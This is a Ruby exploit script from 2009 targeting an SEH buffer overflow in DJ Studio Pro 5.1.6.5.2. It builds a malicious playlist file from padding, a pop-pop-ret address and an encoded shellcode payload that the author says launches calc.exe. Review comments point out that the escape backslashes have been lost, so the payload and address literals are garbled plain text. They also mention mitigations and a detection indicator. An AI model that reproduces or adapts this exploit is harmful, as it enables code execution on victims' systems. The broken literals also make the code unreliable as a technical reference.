
# Title : DJ Studio Pro 5.1.6.5.2 SEH Exploit
# Published : 2009-12-30
# Author : Sébastien Duquette


#!/usr/bin/ruby
# Exploit Title : DJ Studio Pro 5.1.6.5.2 SEH Exploit
# Date          : 2009-12-30
# Author        : Sébastien Duquette - ekse.0x@gmail.com
# Software Link : http://www.e-soft.co.uk/
# Version       : 5.1.6.5.2
# Tested on     : Windows XP SP2 En
# OSVDB ID      : 58159
# Overflow originally discovered by prodigy

# exec calc.exe
# NOTE(review): the "exec calc.exe" claim above is the author's and cannot be
# checked from this listing. As rendered, the literals below contain no
# backslashes at all -- "xda" is three ASCII characters, not a \x escape -- so
# the page has evidently lost the escape backslashes and `payload` is plain
# text rather than the byte string the surrounding comments describe.
payload = 
"xdaxdcxd9x74x24xf4x5dx55x59x49x49x49x49x49" +
"x49x49x49x49x43x43x43x43x43x43x43x37x51x5a" +
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" +
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" +
"x75x4ax49x49x6cx48x68x4bx39x45x50x43x30x45" +
"x50x43x50x4dx59x48x65x46x51x4ax72x43x54x4e" +
"x6bx51x42x46x50x4cx4bx50x52x44x4cx4cx4bx51" +
"x42x47x64x4ex6bx44x32x51x38x46x6fx4fx47x42" +
"x6ax45x76x50x31x4bx4fx50x31x4fx30x4ex4cx47" +
"x4cx45x31x51x6cx47x72x44x6cx51x30x4ax61x48" +
"x4fx44x4dx47x71x48x47x49x72x4ax50x43x62x43" +
"x67x4ex6bx51x42x46x70x4cx4bx51x52x45x6cx45" +
"x51x48x50x4cx4bx51x50x44x38x4cx45x4fx30x44" +
"x34x43x7ax46x61x48x50x46x30x4cx4bx47x38x45" +
"x48x4ex6bx51x48x45x70x46x61x48x53x4dx33x47" +
"x4cx47x39x4ex6bx47x44x4cx4bx46x61x4bx66x44" +
"x71x4bx4fx45x61x4bx70x4ex4cx4ax61x4ax6fx46" +
"x6dx45x51x4fx37x44x78x4bx50x44x35x48x74x45" +
"x53x43x4dx4ax58x47x4bx51x6dx47x54x51x65x49" +
"x72x51x48x4cx4bx46x38x51x34x47x71x48x53x51" +
"x76x4cx4bx46x6cx50x4bx4cx4bx43x68x45x4cx43" +
"x31x4ax73x4cx4bx44x44x4cx4bx43x31x4ex30x4d" +
"x59x43x74x45x74x44x64x51x4bx43x6bx51x71x51" +
"x49x42x7ax46x31x49x6fx4bx50x42x78x43x6fx51" +
"x4ax4ex6bx46x72x48x6bx4fx76x51x4dx51x7ax46" +
"x61x4cx4dx4bx35x48x39x47x70x45x50x45x50x42" +
"x70x45x38x46x51x4cx4bx50x6fx4bx37x49x6fx49" +
"x45x4fx4bx48x70x4cx75x4ex42x50x56x51x78x4f" +
"x56x4fx65x4dx6dx4fx6dx49x6fx4bx65x47x4cx44" +
"x46x43x4cx46x6ax4fx70x49x6bx49x70x51x65x47" +
"x75x4dx6bx43x77x45x43x50x72x50x6fx42x4ax47" +
"x70x50x53x4bx4fx48x55x43x53x43x51x50x6cx42" +
"x43x44x6ex43x55x44x38x45x35x45x50x44x4ax41" +
"x41"

# Dead code: nothing below references `pattern`. Presumably a leftover from the
# offset-finding step (the filename suggests a 5000-character cyclic pattern --
# not confirmable here). File.open without a block also leaves this handle open
# until the object is garbage-collected; the script never closes it.
pattern = File.open('pattern_5000.txt', 'r').read

# Assembles the crafted .pls file: 1308 filler bytes, one 4-byte value, the
# value the author labels as a pop-pop-ret address inside djstudiopro.exe, the
# payload, then 10000 trailing filler bytes. This is the classic SEH-overwrite
# file layout that SafeSEH, SEHOP and DEP were introduced to defeat; on the
# detection side, a playlist file of this size consisting almost entirely of
# repeated 'A' with no playlist entries is a strong file-content indicator.
f = File.open('boom.pls', 'w')
# Padding up to the offset the author found (1308 bytes).
f.print 'A' * 1308
# 4-byte value written immediately before the handler address; like `payload`,
# the rendered text has lost its \x escapes, so this prints 12 ASCII characters.
f.print "xebx06x90x90"
# Author's comment gives the intended address; as rendered the literal is 10
# ASCII characters, not 4 bytes.
f.print "x2dxc6x4f1"   # pop-pop-ret @ 0x014FC62D [djstudiopro.exe]
f.print payload
f.print 'A' * 10000

# Explicit close only runs if no exception is raised above; the block form
# File.open(...) { |f| ... } would guarantee it.
f.close